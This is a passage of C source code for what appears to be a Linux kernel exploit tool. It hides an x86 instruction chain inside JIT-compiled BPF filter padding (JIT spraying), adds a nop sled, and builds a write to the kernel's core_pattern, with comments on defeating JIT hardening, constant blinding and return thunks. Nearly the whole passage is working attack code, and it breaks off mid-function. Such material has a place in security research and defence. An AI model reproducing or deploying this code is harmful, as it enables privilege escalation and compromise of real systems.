#include "rip.h"

#include <linux/bpf_common.h>
#include <linux/filter.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ASSERT(x)  ({ bool __res = (x); if (!__res) { fprintf(stderr, "assertion failure: %s\n", #x); abort(); }; __res; })

//
// Parameters
//
// environment restrictions
#define MAX_NUM_INSNS 0x1000
#define OPTMEM_MAX 0x5000

// What is the return address from where we are being called?
static __u64 return_addr = 0xA0ffffff81000000;
// Where do we write the payload? &core_pattern
static __u64 target_addr = 0xB0ffffff83000000 - PAYLOAD_OFFSET;

// Environment settings. For the spray to succeed we need proper alignment.
// How many bytes are allocated by the module allocator?
static unsigned long module_alloc_space_taken = 0;
// How many bytes are allocated in the last bpf jit pack?
static unsigned long bpf_jit_pack_space_taken = 0;

// arbitrarily chosen, needs to fit into optmem_max
#define MSB_MAX 0x44
_Static_assert(MSB_MAX < (OPTMEM_MAX >> 8), "invalid msb");

// choose some low value which is used as increment in the add/sub chain
// we do not choose 1 here because longer payloads will run into trouble
// when jumps in the beginning need to reference later jumps (where we have
// no flexibility in the current rather simple encoding algorithm)
// So choose some higher value which is not likely to interfere and hope
// for the best. Works (TM)
#define MSB_FIXUP 3

// Allocation size to assume for eBPF jit header and junk bytes that are unusable
// for us. This always gets aligned up to multiples of 64. It is a little less,
// leaving us a little bit of room for approximation errors.
#define HEADER_LEN 64

// Set this if you are debugging on nokaslr kernels
// #define NOKASLR_DEBUG

// Set this if return thunks are enabled
#define X86_FEATURE_RETHUNK

static void parse_opts(int argc, char** argv) {
	int opt;
	bool has_return_addr = false;
	bool has_target_addr = false;

	while ((opt = getopt(argc, argv, "r:t:m:p:")) != -1) {
		switch (opt) {
		case 'r':
			return_addr = strtoul(optarg, NULL, 16);
			has_return_addr = true;
			break;
		case 't':
			target_addr = strtoul(optarg, NULL, 16) - PAYLOAD_OFFSET;
			has_target_addr = true;
			break;
		case 'm':
			module_alloc_space_taken = strtoul(optarg, NULL, 16);
			break;
		case 'p':
			bpf_jit_pack_space_taken = strtoul(optarg, NULL, 16);
			break;
		default:
		usage:
			fprintf(stderr, "usage: %s -r <return address> -t <target address> [-m <module alloced space>] [-p <jit pack allocated space>]\n", argv[0]);
			exit(1);
		}
	}

	if (!has_return_addr || !has_target_addr)
		goto usage;

	ASSERT((return_addr & 0xFFFFFFFF00000000) == (target_addr & 0xFFFFFFFF00000000) && "we write only 4 bytes");
}

//
//
//

typedef __u8 u8;
typedef __u16 u16;
typedef __u32 u32;
typedef __u64 u64;

#define LEN(x) (sizeof(x) / sizeof(x[0]))

#define MAX(a, b) ((a) > (b) ? (a) : (b))
#define MIN(a, b) ((a) < (b) ? (a) : (b))

// 2-byte instruction. Mostly used as no-op padding to fix alignment
#define __add_al(x) (0x04 | (((x) & 0xFF) << 8))
//
#define mov_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0xb8)
#define xor_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0x35)
#define add_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0x05)
#define sub_eax_0xe90000XX(XX) ((((XX) & 0xFF) << 8) | 0x2d)

//	or r8d, dword ptr [rax]	44 0b 00
#define or_r8d_RAX() (0x000b44)
//	add r8d, dword ptr [rax]	44 03 00
#define add_r8d_RAX() (0x000344)
//	add dword ptr [rax], r8d	44 01 00
#define add_RAX_r8d() (0x000144)

#define push_rsp() (0x54 | (__add_al(0) << 8))
#define push_rbp() (0x55 | (__add_al(0) << 8))
#define push_rax() (0x50 | (__add_al(0) << 8))
#define push_rdx() (0x52 | (__add_al(0) << 8))
#define pop_rbp() (0x5d | (__add_al(0) << 8))
#define pop_rax() (0x58 | (__add_al(0) << 8))
#define pop_rdx() (0x5a | (__add_al(0) << 8))

// will terminate the chain
#define __fnsave_RAX() (0x30dd)

//	add [rbp], eax
#define add_RBP_eax() (0x4501)
//	sub [rbp], eax
#define sub_RBP_eax() (0x4529)

#define ret() (0xc3)


// Emit a chain of eax-immediate ALU instructions (the 0xe90000XX-immediate
// mov/xor/add/sub encodings above) into offsets[] starting at index i, such
// that after the chain executes eax == byte.
// Only the lowest immediate byte is freely choosable and it is capped at
// MSB_MAX; the 0xe9 high bytes that every immediate carries are cancelled
// out via 32-bit wrap-around by repeated add/sub steps. The local `eax`
// mirrors the value the real register will hold at runtime.
// Returns the next free index into offsets[].
static unsigned mov_byte_into_eax(u32* offsets, unsigned i, u8 byte) {
	offsets[i++] = mov_eax_0xe90000XX(MSB_MAX);
	u32 eax = 0xe9000000 | MSB_MAX; // simulated register state
	do {
		u8 lsb = (u8)(eax & 0xFF);
		if (eax > 0xFF /*MSB fixup required*/) {
			u8 rest = lsb ^ byte;
			if (rest <= MSB_MAX) {
				// try to do short XOR encoding if possible
				offsets[i++] = xor_eax_0xe90000XX(rest);
				eax ^= 0xe9000000 | rest;
			} else  if (lsb > byte) {
				u8 diff = lsb - byte;
				ASSERT(diff <= MSB_MAX);

				offsets[i++] = sub_eax_0xe90000XX(diff);
				eax -= 0xe9000000 | (u32)diff;
			} else {
				// cannot reach the target in one step; keep subtracting the
				// small fixed increment until one of the cases above applies
				offsets[i++] = sub_eax_0xe90000XX(MSB_FIXUP);
				eax -= 0xe9000000 | MSB_FIXUP;
			}
		} else {
			// high bytes are cancelled at this point; nudge the low byte up
			// (the add below re-introduces 0xe9 high bytes, so the loop
			// continues until both halves line up)
			if (lsb < byte) {
				u8 diff = (byte - lsb) + MSB_FIXUP /*reserve for MSB fixup*/;
				if (diff > MSB_MAX)
					diff = MSB_MAX;

				offsets[i++] = add_eax_0xe90000XX(diff);
				eax += 0xe9000000 | (u32)diff;
			} else {
				offsets[i++] = add_eax_0xe90000XX(MSB_FIXUP);
				eax += 0xe9000000 | MSB_FIXUP;
			}

		}

		ASSERT(i <= MAX_NUM_INSNS);
	} while (eax != (u32)byte);

	return i;
}

#define INSN_START 0x20
#define INSN_CONT 0x40
#define INSN_OFF 0x80

// Instructions we use for padding. They need to fullfill the following properties:
// - low number of BPF instructions
// - high number of x86 instructions
// - have a stable length under sysctl.net.core.bpf_jit_harden=1
//
// Rationale: Filter sizes are checked against optmem_max and this is estimated
// based on number of _BPF_ instructions. So in order to squeeze the maximum number
// of padding out of instructions we want to have single BPF instructions that
// generate a lot more bytes than the estimate.
enum insn {
	/* sorted by effective size (JITed x86 bytes, see insn_lengths below) */
	NEG, /* size = 2 */
	__INSN_MIN = NEG,

	SHL, /* size = 3 */
	STX, /* size = 4 */

	DIV, /* size = 20, three instructions */
	MOD, /* size = 22, three instructions */

	/* special instruction, requires extra care to be able to encode it but
	   provides best effective size by far */
	JEQ, /* size = 9 */

	__INSN_MAX = JEQ,

	// additional special instructions not used for encoding
	// (emitted explicitly, never chosen by find_minimal_encoding)
	JMP,
	RET,

#ifdef X86_FEATURE_RETHUNK
	// Sigh. On X86_FEATURE_RETHUNK ret sizes are not stable ..
	// The first BPF_RET of an image additionally accounts for the jump to
	// the return thunk, so it gets its own size entry.
	FIRST_RET,
#else
	FIRST_RET = RET,
#endif

	__INSN_LEN,
	INVALID,
};

#ifdef X86_FEATURE_RETHUNK
#define RET_THUNK_ADD_SIZE 4
#else
#define RET_THUNK_ADD_SIZE 0
#endif

// x86-64 byte sizes the kernel eBPF JIT emits for each instruction above
// (after the classic-BPF -> eBPF rewrite).
// NOTE(review): presumably measured against a specific kernel's
// bpf_jit_comp with constant blinding enabled -- re-verify these constants
// when targeting other kernel versions.
static const unsigned insn_lengths[__INSN_LEN] = {
	[NEG] = 2,
	[SHL] = 3,
	[STX] = 4,

	[JEQ] = 9,

	/* A note on div/mod: They get re-written into three instructions because of
	   constant blinding. opt-mem charges a flat 8 bytes per instruction, thus they
	   are sadly only slightly better than the smaller instructions */
	[DIV] = 20,
	[MOD] = 22,

	[JMP] = 5,
	[RET] = 5, /* assuming LD_IND was not used, both for back
	              jumps and the epilogue generated first */
#ifdef X86_FEATURE_RETHUNK
	[FIRST_RET] = 5 + RET_THUNK_ADD_SIZE /*offset of jump to thunk*/,
#endif
};


// Estimate the number of x86 bytes the kernel JIT will emit for the filter
// body (prologue/header not included), using the per-instruction sizes from
// insn_lengths. Unknown opcodes are charged 4 bytes with a warning.
static unsigned __total_size(struct sock_filter* filter, unsigned len) {
	unsigned total = 0;
	bool has_ret = false;

	for (unsigned n = 0; n < len; n++) {
		const unsigned code = filter[n].code;

		if (code == (BPF_ALU | BPF_NEG)) {
			total += insn_lengths[NEG];
		} else if (code == (BPF_ALU | BPF_LSH | BPF_K)) {
			total += insn_lengths[SHL];
		} else if (code == BPF_STX) {
			total += insn_lengths[STX];
		} else if (code == (BPF_JMP | BPF_JEQ | BPF_X)) {
			total += insn_lengths[JEQ];
		} else if (code == (BPF_ALU | BPF_DIV | BPF_K)) {
			total += insn_lengths[DIV];
		} else if (code == (BPF_ALU | BPF_MOD | BPF_K)) {
			total += insn_lengths[MOD];
		} else if (code == (BPF_RET | BPF_A)) {
			has_ret = true;
			total += insn_lengths[RET];
		} else if (code == (BPF_JMP | BPF_JA)) {
			// this is not entirely correct, but we do not use the short jumps often
			total += insn_lengths[JMP];
		} else if (code == (BPF_ALU | BPF_RSH | BPF_K)) {
			total += 2;
		} else {
			fprintf(stderr, "[warning] size calculation: unknown instruction 0x%x. assuming size = 4\n", filter[n].code);
			total += 4;
		}
	}

	// the return-thunk jump is emitted once per image, not once per ret
	if (has_ret)
		total += RET_THUNK_ADD_SIZE;

	return total;
}


// One entry per byte of the future JITed image. `flags` is a bitmask of
// INSN_START (an instruction begins at this byte), INSN_CONT (byte belongs
// to an instruction started earlier) and INSN_OFF (a jump lands on this
// byte, so an instruction must start exactly here).
struct map_entry {
	u8 flags;
	u8 insn;	// enum insn occupying this byte (valid when INSN_START is set)
	union {
		u16 i;  	// bpf instruction index if this is not a jump
		u16 off;	// jump offset if this is a jump instruction
	};
} __attribute__((__packed__));

// Find a sequence of BPF instructions whose JITed bytes add up to exactly
// `length` and write the resulting START/CONT flags and insn choices into
// seq[]. Greedy: take as many of the largest instruction as fit, then the
// next smaller one, backtracking one step when a remainder cannot be
// represented. JEQ is only eligible when the caller guarantees its forward
// jump distance is encodable (allow_jeq). Returns false if no combination
// sums to `length`.
static bool find_minimal_encoding(struct map_entry* seq, u32 length, bool allow_jeq) {
	unsigned factors[__INSN_LEN + 2] = {}; // factors[i] = how many of insn i to emit

	if (length == 0)
		return true;

	// This is not entirely correct and does not always find the minimum. But it
	// is way simpler than a proper optimization so we go with it.

	u32 left = length;
	_Static_assert(JEQ == __INSN_MAX, "assuming JEQ is max");
	const int i_max = allow_jeq ? __INSN_MAX : (__INSN_MAX - 1);
	int i = i_max;

	while (left != 0 && i <= i_max) {
		const unsigned insn_len = insn_lengths[i];

		if (i < __INSN_MIN) {
			// backtrack: give back one instance of the next larger
			// instruction that was used and retry the smaller ones
			while (i <= i_max) {
				i++;
				if (factors[i]) {
					factors[i] -= 1;
					left += insn_lengths[i];
					break;
				}
			}
		} else if (left >= insn_len) {
			factors[i] = left / insn_len;
			left = left % insn_len;
		} else {
			factors[i] = 0;
		}

		i--;
	}

	if (left == 0) {
		// materialize the chosen factor counts into the byte map,
		// largest instructions first
		unsigned seq_i = 0;
		for (i = i_max; i >= __INSN_MIN; i--) {
			unsigned factor = factors[i];
			while (factor--) {
				ASSERT(seq[seq_i].insn == 0);
				seq[seq_i].flags |= INSN_START;
				seq[seq_i++].insn = i;

				for (unsigned n = 1; n < insn_lengths[i]; n++)
					seq[seq_i++].flags |= INSN_CONT;
			}
		}

		return true;
	} else {
		return false;
	}
}

#define PRINT_FILTER(f) printf("\t{ .k = 0x%08x, .code = 0x%04x, .jt = 0x%02x, .jf = 0x%02x },\n", (f).k, (f).code, (f).jt, (f).jf)
#define OP(CODE, K) do { \
		filter[insn_i].k = K; \
		filter[insn_i++].code = (CODE); \
		ASSERT(insn_i < *filter_len); \
	} while (0)

// Experimental overlapping encoding support
// If HOLE_PADDING_SLED == 1, we will fill additional hole bytes with a nop sled
// instead of the default minimal instruction encoding
#define HOLE_PADDING_SLED 1
// State for interleaving a secondary jump chain into the holes of a primary
// chain (see __encode_into_hole()).
struct hole_opts {
	u32 pad;	// minimum padding bytes wanted before the secondary payload

	// the secondary chain's jump offsets (same format as __encode_offsets)
	const u32* offsets;
	u32 n_offsets;

	// encoding state carried across __encode_into_hole() calls
	struct map_entry* map;	// byte map of the secondary chain; NULL until started
	struct map_entry* it;	// current sequence within `map` being emitted

	u32 seq_i;	// iteration cursor into `map`
	u32 seq_remain;	// bytes of the current sequence not yet encoded
};
// Defines a desired hole to encode the given offsets into. PAD specifies
// the desired padding size before the payload.
#define HOLE_INIT(PAD, OFFSETS, N_OFFSETS) { \
		.pad = (PAD), \
		.offsets = (OFFSETS), \
		.n_offsets = (N_OFFSETS), \
		.map = NULL, \
		.it = NULL, \
	}

// Build a byte map containing one long-jump (JMP) instruction per entry of
// offsets[], back to back, and mark each jump's landing byte with INSN_OFF
// so later passes know an instruction must start there. offsets[i] is the
// x86 jump distance relative to the start of jump i. *last receives the
// first byte after the jump instructions. The caller owns (and must free)
// the returned map of OPTMEM_MAX entries.
struct map_entry* __encode_build_map(const u32* offsets, u32 n_offsets, u32* last) {
	struct map_entry* map = calloc(OPTMEM_MAX, sizeof(struct map_entry));
	ASSERT(map != NULL);

	*last = 0;
	for (unsigned i = 0; i < n_offsets; i++) {
		unsigned off = offsets[i];

		const unsigned len = insn_lengths[JMP];

		// need this to ensure proper encoding into a long jump
		ASSERT(off > 123 + len);

		struct map_entry* e = &map[i * len];
		e->flags |= INSN_START;
		e->insn = JMP;
		e->off = off + len;
		for (unsigned n = 1; n < len; n++)
			e[n].flags |= INSN_CONT;

		*last = i * len + len;

		// offset is relative to following instruction
		fprintf(stderr, "jmp %u at %04x with offset %04x jumps to %04x\n", i, i * len, off, i * len + off + len);
		ASSERT(i * len + off + len < OPTMEM_MAX);
		e[off + len].flags |= INSN_OFF;
	}

	return map;
}

// Iterate the byte map: starting at *i, find the next jump-target byte
// (INSN_OFF) and return the gap of still-unencoded bytes directly before
// it. *seq_len receives the gap length, *i is advanced past the target so
// the next call continues from there. Returns NULL when no target is left.
struct map_entry* __encode_map_next_seq(struct map_entry* map, u32* i, u32* seq_len) {
	*seq_len = 0;

	while (*i < OPTMEM_MAX) {
		const u32 pos = *i;

		if (!(map[pos].flags & INSN_OFF)) {
			*i = pos + 1;
			continue;
		}

		// scan backwards to the last byte already claimed by an instruction;
		// the gap starts right behind it
		int start = (int)pos - 1;
		while (start >= 0 && !(map[start].flags & (INSN_CONT | INSN_START)))
			start--;
		start++;

		*seq_len = pos - (unsigned)start;
		*i = pos + 1;
		return &map[start];
	}

	return NULL;
}

// Encode bytes of the secondary chain described by `opts` into a hole of
// the primary chain at seq[] of size `length`.
//
// On the first call (opts->map == NULL) this builds the secondary chain's
// jump map, fills the requested padding (with a NEG/SHL sled or a minimal
// encoding, depending on HOLE_PADDING_SLED), copies the secondary jump
// instructions behind it and starts iterating the secondary chain's gap
// sequences. Subsequent calls keep encoding the remaining sequence bytes
// into further holes.
//
// Returns the number of bytes of the hole that were NOT consumed: 0 when
// the hole was fully encoded, `length` when the hole was left untouched so
// the caller falls back to plain padding.
static u32 __encode_into_hole(struct map_entry* seq, u32 length, struct hole_opts* opts, bool can_encode_je) {
	if (!opts->map) {
		// check if desired padding fits into hole
		u32 pad = opts->pad + opts->n_offsets * insn_lengths[JMP];
		if (pad >= length + 2)
			return length;

		fprintf(stderr, "encoding into hole of size %u with at least %u bytes for padding + jumps\n", length, pad);

		u32 last;
		struct map_entry* map = __encode_build_map(opts->offsets, opts->n_offsets, &last);

		// offset the map for maximum padding
		u32 i = 0;
		u32 seq_len = 0;
		u32 total_seq_len = 0;
		struct map_entry* it = __encode_map_next_seq(map, &i, &seq_len);
		while (it) {
			if (pad + seq_len <= length)
				total_seq_len = seq_len;
			else
				break;

			// note that because we do not fixup the instructions this
			// will always report the full sequence length
			it = __encode_map_next_seq(map, &i, &seq_len);
		}


		// encode whatever will not be filled by us
		u32 rest = length - opts->n_offsets * insn_lengths[JMP] - total_seq_len;
		fprintf(stderr, "filling padding of %u bytes\n", rest);

		// now either do this in the shortest way possible or fill with sled
		#if HOLE_PADDING_SLED
		const unsigned neg = insn_lengths[NEG];
		unsigned i_pad = 0;
		if (rest % neg != 0) {
			const unsigned shl = insn_lengths[SHL];
			_Static_assert(neg % 2 != shl % 2, "need odd instruction length");
			if (rest < shl) {
				// Cannot fix up the padding parity: bail out and let the
				// caller fill the hole conventionally.
				// (This used to `return false`, i.e. 0, which the caller
				// took as "hole fully encoded" -- and it leaked `map`.)
				free(map);
				return length;
			}

			seq[i_pad].flags |= INSN_START;
			seq[i_pad].insn = SHL;
			for (unsigned n = 1; n < shl; n++)
				seq[i_pad + n].flags |= INSN_CONT;

			i_pad += shl;
		}

		if ((rest - i_pad) % neg) {
			// padding not expressible as a SHL/NEG sled; same fallback as
			// above (unreachable for neg = 2 / shl = 3, kept defensively)
			free(map);
			return length;
		}

		while (i_pad < rest) {
			seq[i_pad].flags |= INSN_START;
			seq[i_pad].insn = NEG;
			for (unsigned n = 1; n < neg; n++)
				seq[i_pad + n].flags |= INSN_CONT;

			i_pad += neg;
		}
		#else
		if (!find_minimal_encoding(seq, rest, can_encode_je)) {
			free(map);
			return length;
		}
		#endif

		seq += rest;
		length -= rest;

		// now encode all the jumps
		memcpy(seq, map, opts->n_offsets * insn_lengths[JMP] * sizeof(*map));
		seq += opts->n_offsets * insn_lengths[JMP];
		length -= opts->n_offsets * insn_lengths[JMP];

		// now we can start with the rest; opts->map ownership passes to the
		// caller of __encode_offsets (freed there)
		opts->map = map;
		opts->seq_i = 0;
		opts->seq_remain = 0;
		opts->it = __encode_map_next_seq(opts->map, &opts->seq_i, &opts->seq_remain);
		if (opts->it) {
			// set this dummy encoding on the last instruction to allow iteration to continue
			for (unsigned i = 0; i < opts->seq_remain; i++) {
				opts->it[i].flags |= INSN_CONT;
			}
		}
	}

	// keep filling the current (and following) secondary-chain sequences
	// into this hole until either runs out
	while (length > 0 && opts->seq_remain > 0) {
		u32 seq_len = MIN(opts->seq_remain, length);
		fprintf(stderr, "encoding %u/%u bytes into hole (length = %u)\n", seq_len, opts->seq_remain, length);
		ASSERT(find_minimal_encoding(seq, seq_len, can_encode_je));

		seq += seq_len;
		length -= seq_len;
		opts->seq_remain -= seq_len;

		if (opts->seq_remain == 0) {
			opts->it = __encode_map_next_seq(opts->map, &opts->seq_i, &opts->seq_remain);
			if (opts->it) {
				// set this dummy encoding on the last instruction to allow iteration to continue
				for (unsigned i = 0; i < opts->seq_remain; i++) {
					opts->it[i].flags |= INSN_CONT;
				}
			}
		}
	}

	ASSERT(opts->it == NULL || length == 0);
	return length;
}

// Translate a fully-flagged byte map into real BPF instructions appended to
// filter[] at insn_i.
// Pass 1 assigns every non-jump instruction its BPF instruction index
// (map_entry.i) and sanity-checks the map: each INSN_OFF byte must carry an
// instruction start, and no byte may be both a start and a continuation.
// Pass 2 emits the opcodes, resolving JMP targets into relative BPF
// instruction counts. Returns the new insn_i.
static unsigned __encode_translate_map(struct map_entry* map, unsigned map_len, struct sock_filter* filter, unsigned* filter_len, unsigned insn_i) {
	unsigned errors = 0;
	unsigned n_insn = 0;
	for (unsigned j = 0; j < map_len; j++) {
		if (map[j].flags & INSN_START) {
			unsigned i = n_insn++;

			if (map[j].insn != JMP)
				map[j].i = i;
		}

		if (map[j].flags & INSN_OFF) {
			if (!(map[j].flags & INSN_START)) {
				fprintf(stderr, "failed to encode offset %u\n", j);
				errors++;
			}
		}

		if ((map[j].flags & INSN_START) && (map[j].flags & INSN_CONT)) {
			fprintf(stderr, "overlapping instructions at %u\n", j);
			errors++;
		}
	}

	fprintf(stderr, "n_insn = %u\n", n_insn);
	fprintf(stderr, "errors = %u\n", errors);
	ASSERT(!errors);

	unsigned n_insn_unaccounted = 0;

	// encode all the other instructions
	unsigned i_insn_inner = 0;
	for (unsigned j = 0; j < map_len; j++) {
		if (!(map[j].flags & INSN_START))
			continue;

		switch (map[j].insn) {
		case NEG:
			OP(BPF_ALU | BPF_NEG, 0);
			break;
		case SHL:
			// need k > 1 to get the 3 byte instruction
			OP(BPF_ALU | BPF_LSH | BPF_K, 2);
			break;
		case STX:
			OP(BPF_STX, 0);
			break;
		case JEQ: {
			// just jump furthest possible distance
			// should be long enough because it is checked during encoding.
			u32 jt = MIN(255, n_insn - 1 - i_insn_inner - 1);
			filter[insn_i].jt = (u8)jt;
			filter[insn_i++].code = BPF_JMP | BPF_JEQ | BPF_X;
			ASSERT(insn_i < *filter_len);
			break;
		}
		case DIV:
			// constant blinding expands div/mod into 3 eBPF instructions;
			// the extra 2 are not part of n_insn
			n_insn_unaccounted += 2;
			OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
			break;
		case MOD:
			n_insn_unaccounted += 2;
			OP(BPF_ALU | BPF_MOD | BPF_K, 0x11111111);
			break;
		case RET:
#ifdef X86_FEATURE_RETHUNK
		case FIRST_RET:
#endif
			OP(BPF_RET | BPF_A, 0);
			break;
		case JMP: {
			// need to find the correct jump offset
			struct map_entry* e = map + j + map[j].off;
			ASSERT(e->flags & INSN_START);
			ASSERT(e->insn != JMP); // otherwise e->i would not be valid

			u32 k = e->i - i_insn_inner - 1;
			OP(BPF_JMP | BPF_JA, k);
			break;
		}
		default:
			fprintf(stderr, "invalid instruction: %d\n", map[j].insn);
			break;
		}

		i_insn_inner++;
	}

	fprintf(stderr, "translate map: number of instructions = %u (+%u)\n", i_insn_inner, n_insn_unaccounted);
	return insn_i;
}

// Pick the ret size class to account for: the first BPF_RET | BPF_A of an
// image is FIRST_RET (it carries the thunk-jump bytes on rethunk kernels);
// once the filter already contains one, further rets are plain RET.
static enum insn __suitable_ret(const struct sock_filter* filter, unsigned len) {
	const struct sock_filter* end = filter + len;

	for (const struct sock_filter* f = filter; f != end; f++) {
		if (f->code == (BPF_RET | BPF_A))
			return RET;
	}

	return FIRST_RET;
}

// Encode the x86 jump chain offsets[] into BPF instructions appended to
// filter[]: build the jump byte map, place a ret right behind the jump
// block, fill every gap between jump targets with padding instructions
// (optionally interleaving a secondary chain via hole_opts), append `final`
// as the last instruction and translate the whole map into filter[].
// Returns the new insn_i.
static unsigned __encode_offsets(struct sock_filter* filter, unsigned insn_i, unsigned* filter_len, const u32* offsets, unsigned n_offsets, enum insn final, struct hole_opts* hole_opts) {
	unsigned last = 0;
	struct map_entry* map = __encode_build_map(offsets, n_offsets, &last);

	// Add a ret right after the jump instructions here. So that we do not
	// execute any of the filling instructions after we terminate the
	// chain
	map[last].flags |= INSN_START;
	ASSERT(map[last].insn == 0);
	map[last].insn = __suitable_ret(filter, insn_i);
	for (unsigned i = 1; i < insn_lengths[map[last].insn]; i++)
		map[last + i].flags |= INSN_CONT;

	// find the furthest jump target; JEQ padding may only be used while the
	// remaining distance to it is long enough
	unsigned max_off;
	for (max_off = OPTMEM_MAX; max_off > 0; max_off--) {
		if (map[max_off].flags & INSN_OFF)
			break;
	}

	unsigned seq_i = 0;
	unsigned seq_len = 0;
	last = 0;
	struct map_entry* it = __encode_map_next_seq(map, &seq_i, &seq_len);
	while (it) {
		last = (unsigned long)(it - map) + seq_len;
		fprintf(stderr, "encoding sequence [%04lx - %04x] (%u bytes)\n", (unsigned long)(it - map), last, seq_len);
		bool can_encode_je = (max_off - last) > 127;

		if (hole_opts)
			seq_len = __encode_into_hole(it, seq_len, hole_opts, can_encode_je);

		if (seq_len && !find_minimal_encoding(it, seq_len, can_encode_je)) {
			fprintf(stderr, "could not find instruction sequence for %u bytes\n", seq_len);
			ASSERT(false);
		}

		it = __encode_map_next_seq(map, &seq_i, &seq_len);
	}

	if (hole_opts) {
		// drain whatever is left of the secondary chain behind the last
		// jump target
		if (hole_opts->it) {
			u32 remain = __encode_into_hole(&map[last], OPTMEM_MAX - last, hole_opts, false);
			last += OPTMEM_MAX - last - remain;
			ASSERT(!hole_opts->it);
		}

		free(hole_opts->map);
	}


	map[last].flags |= INSN_START;
	ASSERT(map[last].insn == 0);
	map[last].insn = final;

	insn_i = __encode_translate_map(map, last + 1, filter, filter_len, insn_i);
	free(map);
	return insn_i;
}

// Pad filter[] with throw-away instructions until the estimated JITed image
// size (body + HEADER_LEN) reaches roughly desired_size. Uses JEQ while the
// gap is large (best bytes-per-BPF-instruction ratio), then MODs, and ends
// with at least one RET. Returns the new insn_i.
static unsigned __fill_to_size(struct sock_filter* filter, const unsigned* filter_len, unsigned insn_i, unsigned desired_size) {
	unsigned size = __total_size(filter, insn_i) + HEADER_LEN;
	ASSERT(size <= desired_size);

	// does a "good enough" approximation with minimal instructions

	// JEQ is best, but we need enough space
	// (> 127 keeps the furthest-possible forward jump within range)
	unsigned fixup_start = insn_i;
	while ((desired_size - size) > 127) {
		OP(BPF_JMP | BPF_JEQ | BPF_X, 0);
		size += insn_lengths[JEQ];
	}
	const unsigned fixup_end = insn_i;

	// fill rest with MODs and RETs
	unsigned i;
	for (i = 0; i < (desired_size - size) / insn_lengths[MOD]; i++)
		OP(BPF_ALU | BPF_MOD | BPF_K, 0x11111111);
	size += i * insn_lengths[MOD];
	for (i = 0; i < MAX(1/*need at least one ret at the end*/, (desired_size - size) / insn_lengths[RET]); i++)
		OP(BPF_RET | BPF_A, 0);

	// fixup jump labels, choose furthest possible distances
	for (i = fixup_start; i < fixup_end; i++) {
		u32 jt = MIN(255, insn_i - 1 - i - 1);
		filter[i].jt = (u8)jt;
	}

	fprintf(stderr, "adding %u padding instructions to size 0x%x\n", insn_i - fixup_start, desired_size);
	return insn_i;
}

// Emit 28 BPF_NEG instructions (2 JITed bytes each) as an in-image sled so
// that any of the kernel's random in-chunk start offsets lands us on an
// instruction boundary of our chain. Returns the new insn_i.
static unsigned __add_image_nop_sled(struct sock_filter* filter, unsigned insn_i, const unsigned* filter_len) {
	// add a "nop" sled so that we can reliably hit the payload
	// This generates fdiv / fsubr instructions that corrupt st(0)
	// This means we lose another 10 bytes of the main payload. This is not really
	// a problem for the core_pattern payload but needs to be considered
	// otherwise. (There should be other options for the sled)
	//
	// See bpf_jit_binary_pack_alloc():
	//
	//   hole = min_t(unsigned int, size - (proglen + sizeof(*ro_header)),
	//       BPF_PROG_CHUNK_SIZE - sizeof(*ro_header));
	//   start = get_random_u32_below(hole) & ~(alignment - 1);
	//
	// .. with hole <= 64 - 8 and alignment = 4 ==> start = 4*k for k in [0, 13]
	// with prologue of size P our chain begins at most at P + 56 + 1(unalign)
	// With instruction size = 2 for neg and 28 instructions we are guaranteed
	// to hit the correct alignment and start position.
	//
	// Choosing the guessed payload location depends on this logic. With P = 27
	// in our case, we choose offset 27 + 56 + 1 = 84 for the RIP pointer after
	// the image base.
	for (unsigned j = 0; j < 28; j++)
		OP(BPF_ALU | BPF_NEG, 0);

	return insn_i;
}

// Build the main payload filter: a nop sled followed by an x86 chain that
// (1) duplicates the return address on the stack, (2) byte-wise rewrites a
// copy of it into target_addr using add/sub/xor chains, (3) sets up a stack
// frame for the bpf epilogue, and (4) terminates via __fnsave_RAX(), which
// stores the FPU state to [rax] == target_addr (presumably carrying the
// payload bytes -- see the PAYLOAD_OFFSET handling in parse_opts).
static void prepare_bpf_jit_payload(struct sock_filter* filter, unsigned* filter_len) {
	unsigned insn_i = 0;

	unsigned j = 0;
	u32 offsets[0x1000] = {};

	// always need a nop sled. Since alignment of the final image may not be so
	// accurate we will add a larger nop sled just to be sure.
	for (int i = 0; i < 50; i++)
		OP(BPF_ALU | BPF_NEG, 0);

	// First prepare the return. This variant creates an infinite loop assuming
	//  we are being called from the nop sled.
	//
	//  If this is not desired the nop sled part I needs to preserve any volatile
	//  registers that might be needed (looking at rax, rcx, rbx, rbp in particular,
	//  rcx is always clobbered and needs to be preserved first if needed)
	//  (Depending on the return gadget chosen, r13 is clobbered as well, but fixup
	//   is not so easy in that case)
	//  (If decided to do a graceful return rax can either be the pointer to the
	//   kernel memory we corrupted or any desired value in eax. In the latter case
	//   the standard bpf leave epilogue can be used, but needs setup of course)
	//

	// Coming from the nop sled we have on the stack:
	//
	// [ rip - sled length ] <== rsp
	// [ original callee   ]
	//
	// .. duplicate to keep invariant when infinite looping
	offsets[j++] = pop_rdx();
	offsets[j++] = pop_rax();
	offsets[j++] = push_rax();
	offsets[j++] = push_rdx();
	// .. swap the second copy around so that the callee is at the top
	offsets[j++] = push_rdx();
	offsets[j++] = push_rax();


	// Now create the kernel pointer where we intend to write to.
	// The return address is at the top of the stack now
	// (only the low 4 bytes differ, see the ASSERT in parse_opts)
	for (u8 byte = 0; byte < sizeof(u32); byte++) {
		u8 t = (target_addr >> (byte * 8)) & 0xFF;
		u8 r = (return_addr >> (byte * 8)) & 0xFF;

		u8 off = t > r ? t - r : r - t;
		if (off == 0)
			continue;

		// get a stack pointer
		offsets[j++] = push_rsp();

		if (byte > 0) {
			// get a pointer to the stack pointer into rbp
			offsets[j++] = push_rsp();
			offsets[j++] = pop_rbp();

			// encode the byte offset. We know this will always work
			offsets[j++] = mov_eax_0xe90000XX(0x10);
			offsets[j++] = xor_eax_0xe90000XX(byte ^ 0x10);

			// increment stack pointer
			offsets[j++] = add_RBP_eax();
		}

		// load pointer into rbp. This points to the memory we want to modify
		offsets[j++] = pop_rbp();

		j = mov_byte_into_eax(offsets, j, off);

		// apply the offset
		if (t > r)
			offsets[j++] = add_RBP_eax();
		else
			offsets[j++] = sub_RBP_eax();
	}

	// get the correct address into rax
	offsets[j++] = pop_rax();

	// Now prepare for exit
	//
	// BPF function epilogue looks like this:
	//   pop r13
	//   pop rbx
	//   leave
	//   ret
	//
